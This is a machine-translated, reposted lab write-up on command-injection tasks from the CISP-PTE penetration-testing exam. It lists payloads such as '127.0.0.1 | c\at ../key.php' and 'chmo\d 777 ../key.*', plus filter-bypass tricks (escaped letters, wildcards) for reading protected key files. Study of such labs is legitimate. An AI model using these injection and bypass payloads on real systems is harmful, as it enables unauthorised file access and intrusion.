当前位置:网站首页>2022 cisp-pte (III) command execution

2022 cisp-pte (III) command execution

2022-07-03 06:23:00 A τθ

One 、 The first

1、 Topic environment

Insert picture description here
Insert picture description here

2、 take key

2.1、 Get directory 

127.0.0.1 | ls

Insert picture description here
Insert picture description here 

127.0.0.1 | ls ../

Insert picture description here

2.2、 Read the file 

 Common command execution functions :
system("ls");
eval、exec

linux Reading documents : cat、tac、less、more、head、tail
ca\t、ca''t、cat""t

 If the key.php Do the filter :
key.*  k{
    e}y.php k?y.php

127.0.0.1 | c\at ../key.php

Insert picture description here
Insert picture description here 

127.0.0.1 | t\ac ../key.php

Insert picture description here

The second way

1、 Topic environment

Insert picture description here
Insert picture description here

2、 The problem solving steps

2.1 Get directory

Insert picture description here

2.2 Increase authority 

127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*

Insert picture description here
Insert picture description here
Insert picture description here

2.3 obtain key

127.0.0.1 & t\ac ../key.*

Insert picture description here

3、 ... and 、 The third way

1、 Topic environment

Insert picture description here

2、 The problem solving steps

Insert picture description here

The fourth way

1、 Topic environment

Insert picture description here

2、 The problem solving steps

2.1、ls

Insert picture description here

2.2、 obtain key

http://81.70.245.6:50289?c=cat flag.php;

Insert picture description here
Insert picture description here

原网站

版权声明
本文为[A τθ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/184/202207030612399964.html

边栏推荐

猜你喜欢

随机推荐